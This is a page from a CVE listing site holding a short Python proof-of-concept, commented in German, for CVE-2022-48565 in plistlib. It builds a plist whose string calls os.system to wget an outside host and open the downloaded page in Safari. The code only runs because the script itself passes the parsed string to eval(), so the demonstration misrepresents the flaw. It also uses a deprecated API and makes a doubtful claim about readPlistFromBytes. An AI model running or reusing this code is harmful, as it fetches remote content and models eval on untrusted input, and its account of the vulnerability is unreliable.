4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / cve-2022-48565_poc_wget.py PY
# -*- coding: utf-8 -*-

#####################################
#CVE-2022-48565 POC by Einstein2150 #
#####################################

import plistlib

# Beispiel für eine gefährliche Plist-Datei mit bösartigem Code
malicious_plist = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
    <dict>
        <key>run</key>
        <string>__import__('os').system('wget http://foto-video-it.de &amp;&amp; open -a Safari index.html')</string>
    </dict>
</plist>
'''

# Versucht, die bösartige Plist-Datei zu laden
try:
    # Deserialisieren der bösartigen Plist-Datei (als String, da readPlistFromBytes nicht existiert)
    plist_data = plistlib.readPlistFromString(malicious_plist)
    
    # Dies führt den bösartigen Code aus und lädt die index.html herunter und öffnet sie mit Safari
    eval(plist_data['run'])
except Exception as e:
    print("Ein Fehler ist aufgetreten: ", e)